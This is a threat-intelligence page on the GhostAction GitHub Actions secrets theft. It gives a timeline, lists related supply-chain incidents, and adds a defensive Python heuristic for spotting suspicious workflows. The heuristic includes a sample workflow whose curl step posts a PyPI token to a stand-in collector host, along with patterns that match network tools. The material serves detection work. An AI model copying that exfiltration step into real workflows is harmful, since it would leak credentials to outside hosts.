GhostAction GitHub repository secrets leak
Data Leak
Summary
A GhostAction credential-theft operation exposed 3,325 secrets from GitHub repositories, creating immediate risk of package compromise and account abuse. The theft reached GitHub Actions environments, where malicious workflows pulled tokens, keys, and database credentials into an attacker-controlled endpoint. The compromise first surfaced in FastUUID on September 2, 2025, then expanded across at least 817 repositories. The exposed material included secrets tied to PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS accounts.
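A defensive audit heuristic for the workflow pattern described in the summary above and in the timeline: a workflow triggered on push or manual dispatch that references repository secrets and contacts an outside host. This is an added example, not code from GitGuardian or any affected project; the host allowlist, function names and sample workflows are assumptions constructed for illustration.

```python
import re

# Assumption: hosts this organization's workflows are expected to contact.
ALLOWED_HOSTS = {"github.com", "githubusercontent.com", "pypi.org", "npmjs.org"}
RISKY_TRIGGERS = {"push", "workflow_dispatch"}  # triggers named in the report
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")

def _allowed(host):
    # Exact match or subdomain of an allowlisted host.
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)

def _triggers(text):
    # Handles both inline ("on: [push]") and block ("push:") trigger styles.
    found = set()
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("on:") or re.match(r"(push|workflow_dispatch)\s*:", s):
            found.update(re.findall(r"\b(push|workflow_dispatch)\b", s))
    return found

def audit_workflow(text):
    """Return a finding dict if the workflow matches the pattern, else None."""
    lines = [l for l in text.splitlines() if not l.lstrip().startswith("#")]
    body = "\n".join(lines)
    triggers = _triggers(body) & RISKY_TRIGGERS
    secrets = set(SECRET_REF.findall(body))
    hosts = {h for h in URL_HOST.findall(body) if not _allowed(h)}
    if triggers and secrets and hosts and NET_TOOL.search(body):
        return {"triggers": sorted(triggers), "secrets": sorted(secrets),
                "hosts": sorted(hosts)}
    return None

# Constructed samples (not taken from any affected repository).
SUSPICIOUS = """\
name: constructed-sample
on: [push, workflow_dispatch]
jobs:
  job:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -d "t=$TOKEN" https://collector.example.invalid/
        env:
          TOKEN: ${{ secrets.PYPI_API_TOKEN }}
"""
BENIGN = SUSPICIOUS.replace("collector.example.invalid", "upload.pypi.org")

if __name__ == "__main__":
    print(audit_workflow(SUSPICIOUS))
    print(audit_workflow(BENIGN))
```

A finding is a prompt for review of the workflow's commit history and author, not proof of compromise; the check is a text heuristic and does not parse YAML.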
Related Happenings
Lightning PyPI router_runtime.js credential-stealing payload
Malware Activity
First: 30.04.2026 19:31
Last: 30.04.2026 19:31
Sources 1
About this happening:
The **Lightning** PyPI package was pushed in **malicious versions 2.6.2 and 2.6.3** on **April 30, 2026**, turning a normal install into **credential theft** for **developer and C...
Latest development: 04.05.2026 20:15
Microsoft Threat Intelligence says Defender detected and prevented the malicious `lightning==2.6.3` routine in customer environments, notified the Lightning maintainer, and warned that users who ran `import lightning` may need to rotate exposed secrets, keys, and tokens.
Mini Shai-Hulud SAP-related npm supply-chain campaign
Campaign
First: 29.04.2026 19:26
Last: 29.04.2026 19:26
Sources 1
About this happening:
A new **Mini Shai-Hulud** supply-chain campaign is targeting **SAP-related npm packages**, putting **developer and CI/CD environments** at risk of credential theft and malicious p...
Latest development: 12.05.2026 11:50
Mini Shai-Hulud expands beyond the original SAP-related npm packages to compromise TanStack, UiPath, Mistral AI, OpenSearch, Guardrails AI, and DraftLab packages across npm and PyPI, with malicious payloads using router_init.js, GitHub Actions abuse, and exfiltration to filev2.getsession[.]org, api.masscan[.]cloud, or attacker-controlled GitHub repositories.
GitHub git push RCE (CVE-2026-3854)
Vulnerability
First: 29.04.2026 15:41
Last: 29.04.2026 15:41
Sources 1
About this happening:
GitHub patched **CVE-2026-3854**, a critical **remote code execution** flaw affecting **GitHub.com** and **GitHub Enterprise Server** that could expose **millions of private repos...
Elementary-data package hit by network compromise
Incident
First: 27.04.2026 18:17
Last: 27.04.2026 18:17
Sources 1
About this happening:
The **elementary-data** project suffered a **malicious release compromise** that exposed users of **PyPI** and **GitHub Container Registry** to a backdoored package and image. An...
Developer environments using KICS data exposed after Checkmarx breach
Data Leak
First: 23.04.2026 19:05
Last: 23.04.2026 19:05
Sources 1
About this happening:
The compromised **Checkmarx KICS** toolchain was used to exfiltrate **GitHub tokens**, **cloud credentials**, and other secrets from developer environments, creating immediate acc...
Timeline
- 08.09.2025 22:53 · 1 article · 8mo ago
GhostAction compromises FastUUID secrets through a malicious GitHub Actions workflow
Detection IoC Update: GitGuardian identified the first signs of compromise in FastUUID on September 2, 2025, after compromised maintainer accounts had added a malicious GitHub Actions workflow that triggered on push or manual dispatch and exfiltrated secrets from the project's GitHub Actions environment to an attacker-controlled domain.
Sources:
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53
- 08.09.2025 22:53 · 2 articles · 8mo ago
GhostAction reaches at least 817 repositories and GitGuardian notifies package ecosystem teams
Campaign Scope Update: GitGuardian determined that GhostAction had expanded beyond FastUUID to at least 817 repositories, and on September 5, 2025, it opened GitHub issues in 573 impacted repositories while directly notifying the security teams of GitHub, npm, and PyPI; the campaign had already stolen roughly 3,325 secrets across package ecosystems.
Sources:
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53